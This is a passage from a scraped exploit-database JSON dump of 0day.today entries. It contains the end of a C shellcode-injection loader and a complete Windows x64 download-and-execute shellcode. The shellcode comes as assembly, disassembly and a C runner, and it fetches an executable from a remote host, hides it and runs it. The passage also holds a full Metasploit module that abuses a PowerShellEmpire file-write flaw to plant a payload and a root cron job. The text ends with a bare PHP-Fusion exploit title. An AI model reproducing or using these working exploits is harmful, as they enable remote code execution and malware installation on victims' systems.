//allocating memory process memory\r\n \r\n if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)\r\n {\r\n printf(\"Failed to allocate memory into process\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n //writing shellcode into process memory\r\n \r\n WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);\r\n \r\n if(sizeof(shellcode)!=total)\r\n {\r\n printf(\"Failed write shellcode into process memory\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n //Executing shellcode\r\n \r\n if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)\r\n {\r\n printf(\"Failed to Execute shellcode\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n CloseHandle(proc);\r\n CloseHandle(s);\r\n \r\n return 0;\r\n \r\n \r\n}\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26603"}, {"lastseen": "2018-01-02T15:06:42", "references": [], "description": "Exploit for win64 platform in category shellcode", "edition": 1, "reporter": "Roziul Hasan Khan Shifat", "published": "2016-11-24T00:00:00", "title": "Windows/x64 - Download & Execute Shellcode (358 bytes)", "type": "zdt", "enchantments": {"score": {"modified": "2018-01-02T15:06:42", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-11-24T00:00:00", "id": "1337DAY-ID-26407", "href": "https://0day.today/exploit/description/26407", "sourceData": "/*\r\n \r\n # Title : Windows x64 Download+Execute Shellcode\r\n # Author : Roziul Hasan Khan Shifat\r\n # Date : 24-11-2016\r\n # size : 358 bytes\r\n # Tested on : Windows 7 x64 Professional\r\n # Email : [email\u00a0protected] \r\n \r\n*/\r\n \r\n \r\n/*\r\n \r\n \r\nsection .text\r\n global _start\r\n_start:\r\n \r\n \r\n;-----------------------------\r\n \r\nsub rsp,88\r\n \r\nlea r14,[rsp]\r\nsub rsp,88\r\n \r\n \r\n;------------------------------------------------\r\n \r\n \r\nxor rdx,rdx\r\nmov rax,[gs:rdx+0x60] ;PEB\r\nmov rsi,[rax+0x18] ;PEB.Ldr\r\nmov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList\r\nlodsq\r\nmov rsi,[rax]\r\nmov rdi,[rsi+0x30] ;kernel32.dll base address\r\n \r\n;---------------------------------------------------\r\n \r\n \r\nmov ebx,[rdi+0x3c] ;elf_anew\r\nadd rbx,rdi\r\nmov dl,0x88\r\nmov ebx,[rbx+rdx]\r\nadd rbx,rdi\r\n \r\nmov esi,[rbx+0x1c]\r\nadd rsi,rdi\r\n;--------------------------------------------------\r\n \r\n;loading urlmon.dll\r\n \r\nmov dx,831\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\nxor rdx,rdx\r\n \r\n \r\nmov [r14],dword 'urlm'\r\nmov [r14+4],word 'on'\r\nmov [r14+6],byte dl\r\n \r\nlea rcx,[r14]\r\n \r\n \r\n \r\ncall rbx\r\n \r\n \r\nmov dx,586\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\nxor rdx,rdx\r\n \r\nmov rcx,'URLDownl'\r\nmov [r14],rcx\r\nmov rcx,'oadToFil'\r\nmov [r14+8],rcx\r\nmov [r14+16],word 'eA'\r\nmov [r14+18],byte dl\r\n \r\n \r\nlea rdx,[r14]\r\nmov rcx,rax\r\n \r\ncall rbx\r\n;;;;;;;;;;;;;;;;;;;;;;-------------------------------------\r\n \r\nmov r15,rax\r\n \r\n;------------------------------------------------\r\n;save as 'C:\\\\Users\\\\Public\\\\p.exe' length: 24+1\r\n \r\nmov rax,'C:\\\\User'\r\nmov [r14],rax\r\nmov rax,'s\\\\Publi'\r\nmov [r14+8],rax\r\nmov rax,'c\\\\p.exe'\r\nmov [r14+16],rax\r\n \r\nxor rdx,rdx\r\nmov [r14+24],byte dl\r\n \r\n \r\n;----------------------------------------\r\n \r\n \r\nlea rcx,[r14+25]\r\n \r\n \r\n;url \"http://192.168.10.129/pl.exe\" length: 28+1\r\n \r\nmov rax,'http://1'\r\nmov [rcx],rax\r\nmov rax,'92.168.1'\r\nmov [rcx+8],rax\r\nmov rax,'0.129/pl'\r\nmov [rcx+16],rax\r\nmov [rcx+24],dword '.exe'\r\nmov [rcx+28],byte dl\r\n \r\n \r\n;---------------------------------------------------\r\n \r\nsub rsp,88\r\n \r\n \r\ndownload:\r\nxor rcx,rcx\r\nlea rdx,[r14+25]\r\nlea r8,[r14]\r\nxor r9,r9\r\nmov [rsp+32],r9\r\n \r\ncall r15\r\n \r\nxor rdx,rdx\r\ncmp rax,rdx\r\njnz download\r\n \r\n \r\n \r\n;------------------------------------------------\r\nsub rsp,88\r\n;-----------------------------------------------\r\n;hiding file\r\n \r\n \r\n \r\n \r\nmov dx,1131\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi ;SetFileAttributesA()\r\n \r\n \r\nlea rcx,[r14]\r\nxor rdx,rdx\r\nmov dl,2\r\n \r\ncall rbx\r\n \r\n;------------------------------------\r\n;executing file\r\nxor rdx,rdx\r\nmov dx,1314\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi ;WinExec()\r\n \r\n \r\nlea rcx,[r14]\r\n \r\nxor rdx,rdx\r\n \r\n \r\n \r\ncall rbx\r\n \r\n \r\n;------------------------------\r\nxor rdx,rdx\r\nmov dx,296\r\nmov ebx,[rsi+rdx*4]\r\nadd rbx,rdi\r\n \r\n;---------------------------------------\r\n \r\n;if U use this shellcode for pe injection, then don't forget to free allocated space\r\n \r\nadd rsp,88\r\nxor rcx,rcx\r\ncall rbx\r\n \r\n \r\n*/\r\n \r\n/*\r\n \r\n \r\nDisassembly of section .text:\r\n \r\n0000000000000000 <_start>:\r\n 0: 48 83 ec 58 sub $0x58,%rsp\r\n 4: 4c 8d 34 24 lea (%rsp),%r14\r\n 8: 48 83 ec 58 sub $0x58,%rsp\r\n c: 48 31 d2 xor %rdx,%rdx\r\n f: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax\r\n 14: 48 8b 70 18 mov 0x18(%rax),%rsi\r\n 18: 48 8b 76 10 mov 0x10(%rsi),%rsi\r\n 1c: 48 ad lods %ds:(%rsi),%rax\r\n 1e: 48 8b 30 mov (%rax),%rsi\r\n 21: 48 8b 7e 30 mov 0x30(%rsi),%rdi\r\n 25: 8b 5f 3c mov 0x3c(%rdi),%ebx\r\n 28: 48 01 fb add %rdi,%rbx\r\n 2b: b2 88 mov $0x88,%dl\r\n 2d: 8b 1c 13 mov (%rbx,%rdx,1),%ebx\r\n 30: 48 01 fb add %rdi,%rbx\r\n 33: 8b 73 1c mov 0x1c(%rbx),%esi\r\n 36: 48 01 fe add %rdi,%rsi\r\n 39: 66 ba 3f 03 mov $0x33f,%dx\r\n 3d: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 40: 48 01 fb add %rdi,%rbx\r\n 43: 48 31 d2 xor %rdx,%rdx\r\n 46: 41 c7 06 75 72 6c 6d movl $0x6d6c7275,(%r14)\r\n 4d: 66 41 c7 46 04 6f 6e movw $0x6e6f,0x4(%r14)\r\n 54: 41 88 56 06 mov %dl,0x6(%r14)\r\n 58: 49 8d 0e lea (%r14),%rcx\r\n 5b: ff d3 callq *%rbx\r\n 5d: 66 ba 4a 02 mov $0x24a,%dx\r\n 61: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 64: 48 01 fb add %rdi,%rbx\r\n 67: 48 31 d2 xor %rdx,%rdx\r\n 6a: 48 b9 55 52 4c 44 6f movabs $0x6c6e776f444c5255,%rcx\r\n 71: 77 6e 6c \r\n 74: 49 89 0e mov %rcx,(%r14)\r\n 77: 48 b9 6f 61 64 54 6f movabs $0x6c69466f5464616f,%rcx\r\n 7e: 46 69 6c \r\n 81: 49 89 4e 08 mov %rcx,0x8(%r14)\r\n 85: 66 41 c7 46 10 65 41 movw $0x4165,0x10(%r14)\r\n 8c: 41 88 56 12 mov %dl,0x12(%r14)\r\n 90: 49 8d 16 lea (%r14),%rdx\r\n 93: 48 89 c1 mov %rax,%rcx\r\n 96: ff d3 callq *%rbx\r\n 98: 49 89 c7 mov %rax,%r15\r\n 9b: 48 b8 43 3a 5c 5c 55 movabs $0x726573555c5c3a43,%rax\r\n a2: 73 65 72 \r\n a5: 49 89 06 mov %rax,(%r14)\r\n a8: 48 b8 73 5c 5c 50 75 movabs $0x696c6275505c5c73,%rax\r\n af: 62 6c 69 \r\n b2: 49 89 46 08 mov %rax,0x8(%r14)\r\n b6: 48 b8 63 5c 5c 70 2e movabs $0x6578652e705c5c63,%rax\r\n bd: 65 78 65 \r\n c0: 49 89 46 10 mov %rax,0x10(%r14)\r\n c4: 48 31 d2 xor %rdx,%rdx\r\n c7: 41 88 56 18 mov %dl,0x18(%r14)\r\n cb: 49 8d 4e 19 lea 0x19(%r14),%rcx\r\n cf: 48 b8 68 74 74 70 3a movabs $0x312f2f3a70747468,%rax\r\n d6: 2f 2f 31 \r\n d9: 48 89 01 mov %rax,(%rcx)\r\n dc: 48 b8 39 32 2e 31 36 movabs $0x312e3836312e3239,%rax\r\n e3: 38 2e 31 \r\n e6: 48 89 41 08 mov %rax,0x8(%rcx)\r\n ea: 48 b8 30 2e 31 32 39 movabs $0x6c702f3932312e30,%rax\r\n f1: 2f 70 6c \r\n f4: 48 89 41 10 mov %rax,0x10(%rcx)\r\n f8: c7 41 18 2e 65 78 65 movl $0x6578652e,0x18(%rcx)\r\n ff: 88 51 1c mov %dl,0x1c(%rcx)\r\n 102: 48 83 ec 58 sub $0x58,%rsp\r\n \r\n0000000000000106 <download>:\r\n 106: 48 31 c9 xor %rcx,%rcx\r\n 109: 49 8d 56 19 lea 0x19(%r14),%rdx\r\n 10d: 4d 8d 06 lea (%r14),%r8\r\n 110: 4d 31 c9 xor %r9,%r9\r\n 113: 4c 89 4c 24 20 mov %r9,0x20(%rsp)\r\n 118: 41 ff d7 callq *%r15\r\n 11b: 48 31 d2 xor %rdx,%rdx\r\n 11e: 48 39 d0 cmp %rdx,%rax\r\n 121: 75 e3 jne 106 <download>\r\n 123: 48 83 ec 58 sub $0x58,%rsp\r\n 127: 66 ba 6b 04 mov $0x46b,%dx\r\n 12b: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 12e: 48 01 fb add %rdi,%rbx\r\n 131: 49 8d 0e lea (%r14),%rcx\r\n 134: 48 31 d2 xor %rdx,%rdx\r\n 137: b2 02 mov $0x2,%dl\r\n 139: ff d3 callq *%rbx\r\n 13b: 48 31 d2 xor %rdx,%rdx\r\n 13e: 66 ba 22 05 mov $0x522,%dx\r\n 142: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 145: 48 01 fb add %rdi,%rbx\r\n 148: 49 8d 0e lea (%r14),%rcx\r\n 14b: 48 31 d2 xor %rdx,%rdx\r\n 14e: ff d3 callq *%rbx\r\n 150: 48 31 d2 xor %rdx,%rdx\r\n 153: 66 ba 28 01 mov $0x128,%dx\r\n 157: 8b 1c 96 mov (%rsi,%rdx,4),%ebx\r\n 15a: 48 01 fb add %rdi,%rbx\r\n 15d: 48 83 c4 58 add $0x58,%rsp\r\n 161: 48 31 c9 xor %rcx,%rcx\r\n 164: ff d3 callq *%rbx\r\n \r\n*/\r\n \r\n#include<windows.h>\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\n \r\nchar shellcode[]=\\\r\n \r\n\"\\x48\\x83\\xec\\x58\\x4c\\x8d\\x34\\x24\\x48\\x83\\xec\\x58\\x48\\x31\\xd2\\x65\\x48\\x8b\\x42\\x60\\x48\\x8b\\x70\\x18\\x48\\x8b\\x76\\x10\\x48\\xad\\x48\\x8b\\x30\\x48\\x8b\\x7e\\x30\\x8b\\x5f\\x3c\\x48\\x01\\xfb\\xb2\\x88\\x8b\\x1c\\x13\\x48\\x01\\xfb\\x8b\\x73\\x1c\\x48\\x01\\xfe\\x66\\xba\\x3f\\x03\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x48\\x31\\xd2\\x41\\xc7\\x06\\x75\\x72\\x6c\\x6d\\x66\\x41\\xc7\\x46\\x04\\x6f\\x6e\\x41\\x88\\x56\\x06\\x49\\x8d\\x0e\\xff\\xd3\\x66\\xba\\x4a\\x02\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x48\\x31\\xd2\\x48\\xb9\\x55\\x52\\x4c\\x44\\x6f\\x77\\x6e\\x6c\\x49\\x89\\x0e\\x48\\xb9\\x6f\\x61\\x64\\x54\\x6f\\x46\\x69\\x6c\\x49\\x89\\x4e\\x08\\x66\\x41\\xc7\\x46\\x10\\x65\\x41\\x41\\x88\\x56\\x12\\x49\\x8d\\x16\\x48\\x89\\xc1\\xff\\xd3\\x49\\x89\\xc7\\x48\\xb8\\x43\\x3a\\x5c\\x5c\\x55\\x73\\x65\\x72\\x49\\x89\\x06\\x48\\xb8\\x73\\x5c\\x5c\\x50\\x75\\x62\\x6c\\x69\\x49\\x89\\x46\\x08\\x48\\xb8\\x63\\x5c\\x5c\\x70\\x2e\\x65\\x78\\x65\\x49\\x89\\x46\\x10\\x48\\x31\\xd2\\x41\\x88\\x56\\x18\\x49\\x8d\\x4e\\x19\\x48\\xb8\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x48\\x89\\x01\\x48\\xb8\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x48\\x89\\x41\\x08\\x48\\xb8\\x30\\x2e\\x31\\x32\\x39\\x2f\\x70\\x6c\\x48\\x89\\x41\\x10\\xc7\\x41\\x18\\x2e\\x65\\x78\\x65\\x88\\x51\\x1c\\x48\\x83\\xec\\x58\\x48\\x31\\xc9\\x49\\x8d\\x56\\x19\\x4d\\x8d\\x06\\x4d\\x31\\xc9\\x4c\\x89\\x4c\\x24\\x20\\x41\\xff\\xd7\\x48\\x31\\xd2\\x48\\x39\\xd0\\x75\\xe3\\x48\\x83\\xec\\x58\\x66\\xba\\x6b\\x04\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x49\\x8d\\x0e\\x48\\x31\\xd2\\xb2\\x02\\xff\\xd3\\x48\\x31\\xd2\\x66\\xba\\x22\\x05\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x49\\x8d\\x0e\\x48\\x31\\xd2\\xff\\xd3\\x48\\x31\\xd2\\x66\\xba\\x28\\x01\\x8b\\x1c\\x96\\x48\\x01\\xfb\\x48\\x83\\xc4\\x58\\x48\\x31\\xc9\\xff\\xd3\";\r\n \r\nint main()\r\n{\r\nint len=strlen(shellcode);\r\nDWORD l=0;\r\nprintf(\"shellcode length : %d\\n\",len);\r\nVirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);\r\n(* (int(*)()) shellcode)();\r\n \r\nreturn 0;\r\n \r\n}\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26407"}, {"lastseen": "2018-02-16T09:13:17", "references": [], "description": "A vulnerability existed in the PowerShellEmpire server prior to commit f030cf62 which would allow an arbitrary file to be written to an attacker controlled location with the permissions of the Empire server. This exploit will write the payload to /tmp/ directory followed by a cron.d file to execute the payload.", "edition": 1, "reporter": "metasploit", "published": "2016-11-18T00:00:00", "title": "PowerShellEmpire Arbitrary File Upload (Skywalker) Exploit", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-16T09:13:17", "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-11-18T00:00:00", "id": "1337DAY-ID-26353", "href": "https://0day.today/exploit/description/26353", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n TASK_DOWNLOAD = 41\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'PowerShellEmpire Arbitrary File Upload (Skywalker)',\r\n 'Description' => %q{\r\n A vulnerability existed in the PowerShellEmpire server prior to commit\r\n f030cf62 which would allow an arbitrary file to be written to an\r\n attacker controlled location with the permissions of the Empire server.\r\n\r\n This exploit will write the payload to /tmp/ directory followed by a\r\n cron.d file to execute the payload.\r\n },\r\n 'Author' =>\r\n [\r\n 'Spencer McIntyre', # Vulnerability discovery & Metasploit module\r\n 'Erik Daguerre' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['URL', 'http://www.harmj0y.net/blog/empire/empire-fails/']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Platform' => %w{ linux python },\r\n 'Targets' =>\r\n [\r\n [ 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' } ],\r\n [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],\r\n [ 'Linux x64', { 'Arch' => ARCH_X86_64, 'Platform' => 'linux' } ]\r\n ],\r\n 'DefaultOptions' => { 'WfsDelay' => 75 },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 15 2016'))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ false, 'Base URI path', '/' ]),\r\n OptString.new('STAGE0_URI', [ true, 'The resource requested by the initial launcher, default is index.asp', 'index.asp' ]),\r\n OptString.new('STAGE1_URI', [ true, 'The resource used by the RSA key post, default is index.jsp', 'index.jsp' ]),\r\n OptString.new('PROFILE', [ false, 'Empire agent traffic profile URI.', '' ])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n return Exploit::CheckCode::Safe if get_staging_key.nil?\r\n\r\n Exploit::CheckCode::Appears\r\n end\r\n\r\n def aes_encrypt(key, data, include_mac=false)\r\n cipher = OpenSSL::Cipher::AES256.new(:CBC)\r\n cipher.encrypt\r\n iv = cipher.random_iv\r\n cipher.key = key\r\n cipher.iv = iv\r\n data = iv + cipher.update(data) + cipher.final\r\n\r\n digest = OpenSSL::Digest.new('sha1')\r\n data << OpenSSL::HMAC.digest(digest, key, data) if include_mac\r\n\r\n data\r\n end\r\n\r\n def create_packet(res_id, data, counter=nil)\r\n data = Rex::Text::encode_base64(data)\r\n counter = Time.new.to_i if counter.nil?\r\n\r\n [ res_id, counter, data.length ].pack('VVV') + data\r\n end\r\n\r\n def reversal_key\r\n # reversal key for commit da52a626 (March 3rd, 2016) - present (September 21st, 2016)\r\n [\r\n [ 160, 0x3d], [ 33, 0x2c], [ 34, 0x24], [ 195, 0x3d], [ 260, 0x3b], [ 37, 0x2c], [ 38, 0x24], [ 199, 0x2d],\r\n [ 8, 0x20], [ 41, 0x3d], [ 42, 0x22], [ 139, 0x22], [ 108, 0x2e], [ 173, 0x2e], [ 14, 0x2d], [ 47, 0x29],\r\n [ 272, 0x5d], [ 113, 0x3b], [ 82, 0x3b], [ 51, 0x2d], [ 276, 0x2e], [ 213, 0x2e], [ 86, 0x2d], [ 183, 0x3a],\r\n [ 24, 0x7b], [ 57, 0x2d], [ 282, 0x20], [ 91, 0x20], [ 92, 0x2d], [ 157, 0x3b], [ 30, 0x28], [ 31, 0x24]\r\n ]\r\n end\r\n\r\n def rsa_encode_int(value)\r\n encoded = []\r\n while value > 0 do\r\n encoded << (value & 0xff)\r\n value >>= 8\r\n end\r\n\r\n Rex::Text::encode_base64(encoded.reverse.pack('C*'))\r\n end\r\n\r\n def rsa_key_to_xml(rsa_key)\r\n rsa_key_xml = \"<RSAKeyValue>\\n\"\r\n rsa_key_xml << \" <Exponent>#{ rsa_encode_int(rsa_key.e.to_i) }</Exponent>\\n\"\r\n rsa_key_xml << \" <Modulus>#{ rsa_encode_int(rsa_key.n.to_i) }</Modulus>\\n\"\r\n rsa_key_xml << \"</RSAKeyValue>\"\r\n\r\n rsa_key_xml\r\n end\r\n\r\n def get_staging_key\r\n # STAGE0_URI resource requested by the initial launcher\r\n # The default STAGE0_URI resource is index.asp\r\n # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L34\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, datastore['STAGE0_URI'])\r\n })\r\n return unless res and res.code == 200\r\n\r\n staging_key = Array.new(32, nil)\r\n staging_data = res.body.bytes\r\n\r\n reversal_key.each_with_index do |(pos, char_code), key_pos|\r\n staging_key[key_pos] = staging_data[pos] ^ char_code\r\n end\r\n\r\n return if staging_key.include? nil\r\n\r\n # at this point the staging key should have been fully recovered but\r\n # we'll verify it by attempting to decrypt the header of the stage\r\n decrypted = []\r\n staging_data[0..23].each_with_index do |byte, pos|\r\n decrypted << (byte ^ staging_key[pos])\r\n end\r\n return unless decrypted.pack('C*').downcase == 'function start-negotiate'\r\n\r\n staging_key\r\n end\r\n\r\n def write_file(path, data, session_id, session_key, server_epoch)\r\n # target_url.path default traffic profile for empire agent communication\r\n # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L50\r\n data = create_packet(\r\n TASK_DOWNLOAD,\r\n [\r\n '0',\r\n session_id + path,\r\n Rex::Text::encode_base64(data)\r\n ].join('|'),\r\n server_epoch\r\n )\r\n\r\n if datastore['PROFILE'].blank?\r\n profile_uri = normalize_uri(target_uri.path, %w{ admin/get.php news.asp login/process.jsp }.sample)\r\n else\r\n profile_uri = normalize_uri(target_uri.path, datastore['PROFILE'])\r\n end\r\n\r\n res = send_request_cgi({\r\n 'cookie' => \"SESSIONID=#{session_id}\",\r\n 'data' => aes_encrypt(session_key, data, include_mac=true),\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(profile_uri)\r\n })\r\n fail_with(Failure::Unknown, \"Failed to write file\") unless res and res.code == 200\r\n\r\n res\r\n end\r\n\r\n def cron_file(command)\r\n cron_file = 'SHELL=/bin/sh'\r\n cron_file << \"\\n\"\r\n cron_file << 'PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin'\r\n cron_file << \"\\n\"\r\n cron_file << \"* * * * * root #{command}\"\r\n cron_file << \"\\n\"\r\n\r\n cron_file\r\n end\r\n\r\n def exploit\r\n vprint_status('Recovering the staging key...')\r\n staging_key = get_staging_key\r\n if staging_key.nil?\r\n fail_with(Failure::Unknown, 'Failed to recover the staging key')\r\n end\r\n vprint_status(\"Successfully recovered the staging key: #{staging_key.map { |b| b.to_s(16) }.join(':')}\")\r\n staging_key = staging_key.pack('C*')\r\n\r\n rsa_key = OpenSSL::PKey::RSA.new(2048)\r\n session_id = Array.new(50, '..').join('/')\r\n # STAGE1_URI, The resource used by the RSA key post\r\n # The default STAGE1_URI resource is index.jsp\r\n # https://github.com/adaptivethreat/Empire/blob/293f06437520f4747e82e4486938b1a9074d3d51/setup/setup_database.py#L37\r\n res = send_request_cgi({\r\n 'cookie' => \"SESSIONID=#{session_id}\",\r\n 'data' => aes_encrypt(staging_key, rsa_key_to_xml(rsa_key)),\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, datastore['STAGE1_URI'])\r\n })\r\n fail_with(Failure::Unknown, 'Failed to send the RSA key') unless res and res.code == 200\r\n vprint_status(\"Successfully sent the RSA key\")\r\n\r\n # decrypt the response and pull out the epoch and session_key\r\n body = rsa_key.private_decrypt(res.body)\r\n server_epoch = body[0..9].to_i\r\n session_key = body[10..-1]\r\n print_status('Successfully negotiated an artificial Empire agent')\r\n\r\n payload_data = nil\r\n payload_path = '/tmp/' + rand_text_alpha(8)\r\n\r\n case target['Arch']\r\n when ARCH_PYTHON\r\n cron_command = \"python #{payload_path}\"\r\n payload_data = payload.raw\r\n\r\n when ARCH_X86, ARCH_X86_64\r\n cron_command = \"chmod +x #{payload_path} && #{payload_path}\"\r\n payload_data = payload.encoded_exe\r\n\r\n end\r\n\r\n print_status(\"Writing payload to #{payload_path}\")\r\n write_file(payload_path, payload_data, session_id, session_key, server_epoch)\r\n\r\n cron_path = '/etc/cron.d/' + rand_text_alpha(8)\r\n print_status(\"Writing cron job to #{cron_path}\")\r\n\r\n write_file(cron_path, cron_file(cron_command), session_id, session_key, server_epoch)\r\n print_status(\"Waiting for cron job to run, can take up to 60 seconds\")\r\n\r\n register_files_for_cleanup(cron_path)\r\n register_files_for_cleanup(payload_path)\r\n # Empire writes to a log file location based on the Session ID, so when\r\n # exploiting this vulnerability that file ends up in the root directory.\r\n register_files_for_cleanup('/agent.log')\r\n end\r\nend\n\n# 0day.today [2018-02-16] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26353"}]}}

PHP-Fusion &lt;= 6.00.105 Accessible Database Backups Download Exploit

Description

Exploit for unknown platform in category web applications

PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit